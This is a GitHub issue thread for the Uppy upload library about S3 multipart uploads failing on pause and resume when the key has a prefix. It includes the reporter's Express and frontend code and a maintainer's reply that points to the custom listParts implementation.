Resume/Pause functionality breaks with S3 when adding a prefix to the key #5429

Open
2 tasks done
mshoaib112215 opened this issue Aug 26, 2024 · 5 comments

mshoaib112215 commented Aug 26, 2024

Initial checklist

  • I understand this is a bug report and questions should be posted in the Community Forum
  • I searched issues and couldn’t find anything (or linked relevant results below)

Link to runnable example

No response

Steps to reproduce

Description: When I add a prefix to the key to get the pre-signed URL for multipart upload, the file uploads successfully if I don't pause and resume the upload. However, if I pause and then resume the upload, I encounter the following error:

app-index.tsx:25  [Uppy] [14:33:31] TypeError: Cannot read properties of null (reading 'getData')
    at HTTPCommunicationQueue.uploadChunk (HTTPCommunicationQueue.js:272:1)
    at async Promise.all (index 0)
    at async HTTPCommunicationQueue.resumeUploadFile (HTTPCommunicationQueue.js:229:1)

If I remove the prefix from the key, the upload works fine even when paused and resumed. However, I need to add a prefix to the key for my use case.

Backend:

  1. Initialize S3 Client: Set up the S3 client and define the S3 bucket and object key prefix.

  2. Sign URL for Upload: Generate a signed URL for direct file upload to S3.

  3. Handle Multipart Upload:

    • Create: Initialize a multipart upload.
    • Sign Parts: Generate signed URLs for uploading file parts.
    • Complete: Finalize the multipart upload.
    • Abort: Cancel an incomplete multipart upload.
    • Delete File: Remove a file from S3.

Frontend:

  1. Set Up Uppy: Configure Uppy with the AwsS3Multipart plugin for handling multipart uploads.
  2. Request Signed URLs: Use the backend endpoints to get signed URLs for file uploads and parts.
  3. Manage Upload Lifecycle: Initiate, upload parts, and complete or abort the upload using Uppy.

Backend Code:

export const createMultipart = async (req, res, next) => {
    const client = getS3Client();
    const { type, metadata, filename } = req.body;
    if (typeof filename !== "string") {
        return res
            .status(400)
            .json({ error: "s3: content filename must be a string" });
    }
    if (typeof type !== "string") {
        return res.status(400).json({ error: "s3: content type must be a string" });
    }
    const Key = `upload/${crypto.randomUUID()}__${sanitize(filename)}`;

    const params = {
        Bucket: uploadBucket,
        Key: Key,
        ContentType: type,
        Metadata: metadata,
    };

    return client.createMultipartUpload(params, (err, data) => {
        if (err) {
            console.log(err)

            next(err)
            return;
        }
        res.json({
            key: data.Key,
            uploadId: data.UploadId,
        });
    });
}

export const signMultipart = async (req, res, next) => {
    const client = getS3Client();
    const { key, uploadId, partNumber } = req.query;

    if (!validatePartNumber(partNumber)) {
        return res.status(400).json({
            error: "s3: the part number must be an integer between 1 and 10000.",
        });
    }
    if (typeof key !== "string") {
        return res.status(400).json({
            error:
                's3: the object key must be passed as a query parameter. For example: "?key=abc.jpg"',
        });
    }

    client.getSignedUrl(
        "uploadPart",
        {
            Bucket: uploadBucket,
            Key: key,
            UploadId: uploadId,
            PartNumber: partNumber,
            Body: "",
            Expires: expires,
        },
        (err, url) => {
            if (err) {
                next(err);
                return
            }
            res.json({ url, expires });
        },
    );
}

export const getMultipart = async (req, res) => {
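    const { key } = req.query;

    // Check the raw query value: a template string is always a string,
    // so testing the interpolated copy could never fail.
    if (typeof key !== "string") {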
        return res.status(400).json({
            error:
                's3: the object key must be passed as a query parameter. For example: "?key=abc.jpg"',
        });
    }

    // List parts not supported by r2
    res.json([]);
    return;
}
export const multipartCompleted = async (req, res, next) => {
    const client = getS3Client();
    const { key, uploadId } = req.query;
    const Key = `${key}`;

    const { parts } = req.body;

    if (typeof key !== "string") {
        return res.status(400).json({
            error:
                's3: the object key must be passed as a query parameter. For example: "?key=abc.jpg"',
        });
    }
    if (!Array.isArray(parts) || !parts.every(isValidPart)) {
        return res.status(400).json({
            error: "s3: parts must be an array of {ETag, PartNumber} objects.",
        });
    }

    return client.completeMultipartUpload(
        {
            Bucket: uploadBucket,
            Key: Key,
            UploadId: uploadId,
            MultipartUpload: {
                Parts: parts,
            },
        },
        async (err, data) => {
            if (err) {
                console.error(err);
                next(err)
                return;
            }


            res.json({
                location: data.Location,
            });
        },
    );
}

export const deleteMultipart = async (req, res, next) => {
    const client = getS3Client();
    const { key, uploadId } = req.query;
    const Key = `${key}`;

    if (typeof key !== "string") {
        return res.status(400).json({
            error:
                's3: the object key must be passed as a query parameter. For example: "?key=abc.jpg"',
        });
    }

    try {

        return client.abortMultipartUpload(
            {
                Bucket: uploadBucket,
                Key: Key,
                UploadId: uploadId,
            },
            (err) => {
                if (err) {
                    console.error(err);
                    // Forward the error so the request does not hang without a response.
                    next(err);
                    return;
                }
                res.json({});
            },
        );
    }
    catch (error) {
        next(error);
    }
}

Frontend Code:

uppy.use(AwsS3Multipart, {
  async getUploadParameters(file) {
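    return fetch(`${NEXT_PUBLIC_API_URL}/api/upload/sign-s3`, {
      // A request body requires a non-GET method; POST is assumed here.
      method: "POST",
      headers: { "content-type": "application/json" },
      body: JSON.stringify({ filename: file.name }),
      credentials: "include",
    }).then((response) => response.json());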
  },
  shouldUseMultipart(file) {
    return true;
  },
  async createMultipartUpload(file, signal) {
    if (signal?.aborted) {
      const err = new DOMException("The operation was aborted", "AbortError");
      Object.defineProperty(err, "cause", {
        configurable: true,
        writable: true,
        value: signal.reason,
      });
      throw err;
    }

    const metadata = {};

    if (!file.data) {
      const response = await fetch(file.preview);
      const data = await response.arrayBuffer();
      file.data = new Blob([data]);
    }
    const response = await fetch(`${NEXT_PUBLIC_API_URL}/api/upload/s3/multipart`, {
      method: "POST",
      credentials: "include",
      headers: {
        accept: "application/json",
        "content-type": "application/json",
      },
      body: JSON.stringify({
        filename: file.name,
        type: file.type,
        metadata,
      }),
      signal,
    });

    if (!response.ok)
      throw new Error("Unsuccessful request", { cause: response });

    const data = await response.json();

    uploadedPartsList[data.key] = [];

    return data;
  },

  async abortMultipartUpload(file, { key, uploadId }, signal) {
    const response = await fetch(
      `${NEXT_PUBLIC_API_URL}/api/upload/s3/multipart?uploadId=${encodeURIComponent(uploadId)}&key=${prefix}${encodeURIComponent(key)}`,
      {
        method: "DELETE",
        signal,
        credentials: "include",
      },
    );

    if (!response.ok)
      throw new Error("Unsuccessful request", { cause: response });
  },

  async signPart(file, { uploadId, key, partNumber, signal }) {
    if (signal.aborted) {
      const err = new DOMException("The operation was aborted", "AbortError");
      Object.defineProperty(err, "cause", {
        configurable: true,
        writable: true,
        value: signal.reason,
      });
      throw err;
    }

    if (uploadId == null || key == null || partNumber == null) {
      throw new Error(
        "Cannot sign without a key, an uploadId, and a partNumber",
      );
    }

    const response = await fetch(
      `${NEXT_PUBLIC_API_URL}/api/upload/s3/multipart/sign?uploadId=${encodeURIComponent(uploadId)}&partNumber=${encodeURIComponent(partNumber)}&key=${encodeURIComponent(key)}`,
      {
        signal,
        credentials: "include",

      },

    );

    if (!response.ok) {
      throw new Error(`Unsuccessful request: ${response.status} ${response.statusText}`);
    }

    const data = await response.json();
    return data;
 
  },

  async listParts(file, { key, uploadId, signal }) {
    if (signal?.aborted) {
      const err = new DOMException("The operation was aborted", "AbortError");
      Object.defineProperty(err, "cause", {
        configurable: true,
        writable: true,
        value: signal.reason,
      });
      throw err;
    }

     return uploadedPartsList[key];
  },

  async completeMultipartUpload(file, { key, uploadId, parts, signal }) {
    if (signal?.aborted) {
      const err = new DOMException("The operation was aborted", "AbortError");
      Object.defineProperty(err, "cause", {
        configurable: true,
        writable: true,
        value: signal.reason,
      });
      throw err;
    }

    const fileObject = file.data;

    const response = await fetch(
      `${NEXT_PUBLIC_API_URL}/api/upload/s3/multipart/complete?uploadId=${encodeURIComponent(uploadId)}&key=${encodeURIComponent(key)}&name=${encodeURIComponent(fileObject.name)}`,
      {
        method: "POST",
        credentials: "include",
        headers: {
          accept: "application/json",
          "content-type": "application/json",
        },
        body: JSON.stringify({
          parts,
        }),
        signal,
      },
    );

    if (!response.ok)
      throw new Error("Unsuccessful request", { cause: response });

    const data = await response.json();
    // Create a map of successful uploads by file name or ID

    const fileName = file.name;
    const size = file.size;
    const id = file.id;
    const sourcePath = file.s3Multipart.key;

    // Store updated file information in the map

    const existingFile = allFiles.find((file) => file.id === id);

    if (!existingFile) {
      allFiles.push({
        id,
        name: fileName,
        size,
        sourcePath,
      });
    }

    uploadedPartsList[key] = [];

    return data;
  },

  uploadPartBytes({ signature, body, onComplete, size, onProgress, signal }) {
    const { url, headers, expires } = signature;
    if (signal && signal?.aborted) {
      const err = new DOMException("The operation was aborted", "AbortError");
      Object.defineProperty(err, "cause", {
        configurable: true,
        writable: true,
        value: signal.reason,
      });
      throw err;
    }

    if (url == null) {
      throw new Error("Cannot upload to an undefined URL");
    }

    return new Promise((resolve, reject) => {
      const xhr = new XMLHttpRequest();
      xhr.open("PUT", url, true);
      if (headers) {
        Object.keys(headers).forEach((key) => {
          xhr.setRequestHeader(key, headers[key]);
        });
      }
      xhr.responseType = "text";
      if (typeof expires === "number") {
        xhr.timeout = expires * 1000;
      }

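      // Builds the AbortError used to reject the promise when the request is aborted.
      function createAbortError(message = "Aborted") {
        return new DOMException(message, "AbortError");
      }
      function onabort() {
        xhr.abort();
      }
      function cleanup() {
        // `signal` is optional, so guard before touching it.
        signal?.removeEventListener("abort", onabort);
      }
      signal?.addEventListener("abort", onabort);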

      xhr.upload.addEventListener("progress", onProgress);

      xhr.addEventListener("abort", () => {
        cleanup();

        reject(createAbortError());
      });

      xhr.addEventListener("timeout", () => {
        cleanup();

        const error = new Error("Request has expired");
        error.source = { status: 403 };

        reject(error);
      });
      xhr.addEventListener("load", (ev) => {
        cleanup();

        const target = ev.target;

        if (
          target.status === 403 &&
          target.responseText.includes("<Message>Request has expired</Message>")
        ) {
          const error = new Error("Request has expired");
          error.source = target;
          reject(error);
          return;
        }
        if (target.status < 200 || target.status >= 300) {
          const error = new Error("Non 2xx");
          error.source = target;
          reject(error);
          return;
        }

        onProgress(size);

        // NOTE This must be allowed by CORS.
        const etag = target.getResponseHeader("ETag");

        if (etag === null) {
          reject(
            new Error(
              "AwsS3/Multipart: Could not read the ETag header. This likely means CORS is not configured correctly on the S3 Bucket. See https://uppy.io/docs/aws-s3-multipart#S3-Bucket-Configuration for instructions.",
            ),
          );
          return;
        }

        const urlObject = new URL(url);
        // change not-null assertion
        const key = urlObject.pathname.split("/").pop();
        const partNumber = parseInt(
          urlObject.searchParams.get("partNumber"),
          10,
        );

        uploadedPartsList[key]?.push({
          ETag: etag,
          PartNumber: partNumber,
        });

        onComplete(etag);
        resolve({
          ETag: etag,
        });
      });

      xhr.addEventListener("error", (ev) => {
        cleanup();

        const error = new Error("Unknown error");
        error.source = ev.target;
        reject(error);
      });

      xhr.send(body);
      if (signal) {
        signal.onabort = () => {
          xhr.abort();
        };
      }
    });
  },
});

If you need further details or assistance, please let me know!

Expected behavior

The file upload should resume and complete successfully without any errors, even when a prefix is added to the key.

Actual behavior

When the upload is resumed after pausing with a prefix added to the key, the above error occurs. Without the prefix, the upload resumes successfully.
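One detail in the frontend code above that may be relevant: uploadPartBytes derives the bookkeeping key from the signed URL with pathname.split("/").pop(), which keeps only the last path segment. The sketch below uses a made-up signed URL and key (both are assumptions, not values from this report) to show how a prefixed key such as upload/... would then miss the uploadedPartsList entry, so no part is recorded. The fullPathKey alternative assumes virtual-hosted-style URLs, where the path is exactly the object key; with path-style URLs the bucket segment would also have to be stripped.

```javascript
// Hypothetical signed URL for one part of an object whose key has a prefix.
const signedUrl =
  "https://example-bucket.s3.amazonaws.com/upload/1234__video.mp4?partNumber=1&uploadId=abc";

// Same derivation as in uploadPartBytes: keeps only the last path segment.
function lastSegmentKey(url) {
  return new URL(url).pathname.split("/").pop();
}

// Alternative: keep the whole path (minus the leading slash) and decode it.
// Assumes virtual-hosted-style URLs, where the path is exactly the object key.
function fullPathKey(url) {
  return decodeURIComponent(new URL(url).pathname.slice(1));
}

// Mirrors the map that createMultipartUpload fills in with the full key.
const uploadedPartsList = { "upload/1234__video.mp4": [] };

// Optional chaining makes a lookup miss silent: nothing is recorded.
uploadedPartsList[lastSegmentKey(signedUrl)]?.push({ PartNumber: 1 });
const recordedWithLastSegment = uploadedPartsList["upload/1234__video.mp4"].length;

// With the full key the lookup hits and the part is recorded.
uploadedPartsList[fullPathKey(signedUrl)]?.push({ PartNumber: 1 });
const recordedWithFullPath = uploadedPartsList["upload/1234__video.mp4"].length;

console.log(lastSegmentKey(signedUrl), fullPathKey(signedUrl));
console.log(recordedWithLastSegment, recordedWithFullPath);
```

If this is what happens in the real application, listParts would return an empty list on resume even though some parts were already uploaded. Passing the key to the bookkeeping code explicitly, rather than parsing it back out of the URL, would avoid the question of URL style altogether.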

Member

aduh95 commented Aug 27, 2024

@mshoaib112215 can you share the versions of the Uppy packages you're using please?

Member

aduh95 commented Aug 27, 2024

The code you shared can't really be run as is (e.g. there's an undeclared variable prefix), so I can't reproduce the problem you're seeing. Since you say the problem only shows up when you pause and resume an upload, I guess the problem is with the listParts method:

  async listParts(file, { key, uploadId, signal }) {
    if (signal?.aborted) {
      const err = new DOMException("The operation was aborted", "AbortError");
      Object.defineProperty(err, "cause", {
        configurable: true,
        writable: true,
        value: signal.reason,
      });
      throw err;
    }

     return uploadedPartsList[key];
  }

I think the problem is that you're not communicating with your backend to list parts; instead, the client makes assumptions about which parts have been uploaded, and those assumptions are (at least sometimes) wrong, causing incomplete uploads. For reference, here's our internal implementation:

  listParts(
    file: UppyFile<M, B>,
    { key, uploadId, signal }: UploadResultWithSignal,
    oldSignal?: AbortSignal,
  ): Promise<AwsS3Part[]> {
    signal ??= oldSignal // eslint-disable-line no-param-reassign
    this.#assertHost('listParts')
    throwIfAborted(signal)
    const filename = encodeURIComponent(key)
    return this.#client
      .get<
        AwsS3Part[]
      >(`s3/multipart/${encodeURIComponent(uploadId)}?key=${filename}`, { signal })
      .then(assertServerError)
  }

  /**
   * List parts that have been fully uploaded so far.
   *
   * Expected URL parameters:
   *  - uploadId - The uploadId returned from `createMultipartUpload`.
   * Expected query parameters:
   *  - key - The object key in the S3 bucket.
   * Response JSON:
   *  - An array of objects representing parts:
   *     - PartNumber - the index of this part.
   *     - ETag - a hash of this part's contents, used to refer to it.
   *     - Size - size of this part.
   */
  function getUploadedParts (req, res, next) {
    const client = getS3Client(req, res)
    if (!client) return

    const { uploadId } = req.params
    const { key } = req.query

    if (typeof key !== 'string') {
      res.status(400).json({ error: 's3: the object key must be passed as a query parameter. For example: "?key=abc.jpg"' })
      return
    }

    const bucket = getBucket({ bucketOrFn: config.bucket, req })

    const parts = []

    function listPartsPage (startAt) {
      client.send(new ListPartsCommand({
        Bucket: bucket,
        Key: key,
        UploadId: uploadId,
        PartNumberMarker: startAt,
      })).then(({ Parts, IsTruncated, NextPartNumberMarker }) => {
        if (Parts) parts.push(...Parts)

        if (IsTruncated) {
          // Get the next page.
          listPartsPage(NextPartNumberMarker)
        } else {
          res.json(parts)
        }
      }, next)
    }
    listPartsPage()
  }
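
For a custom listParts callback like the one in the original report, the same idea could look roughly like the sketch below: ask the backend which parts exist instead of trusting a client-side map. The makeListParts helper, the apiBase parameter, and the route shape are assumptions for illustration (the route mirrors the internal implementation quoted above), and it only helps if the storage backend actually supports listing parts.

```javascript
// Sketch of a listParts callback that queries the backend for uploaded parts.
// `apiBase` and the route shape are assumptions; adapt them to your own server.
// `fetchImpl` is injectable so the function can be exercised without a network.
function makeListParts(apiBase, fetchImpl = fetch) {
  return async function listParts(file, { key, uploadId, signal }) {
    // Bail out early if the upload was cancelled before the request started.
    signal?.throwIfAborted();

    // Encode both values: a prefixed key contains "/" characters.
    const url =
      `${apiBase}/s3/multipart/${encodeURIComponent(uploadId)}` +
      `?key=${encodeURIComponent(key)}`;

    const response = await fetchImpl(url, { signal, credentials: "include" });
    if (!response.ok) {
      throw new Error(`Unsuccessful request: ${response.status}`);
    }

    // Expected to be an array of { PartNumber, ETag, Size } objects.
    return response.json();
  };
}
```

The returned function could then be passed as the listParts option, for example listParts: makeListParts(NEXT_PUBLIC_API_URL + "/api/upload"), assuming the backend exposes a matching route.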
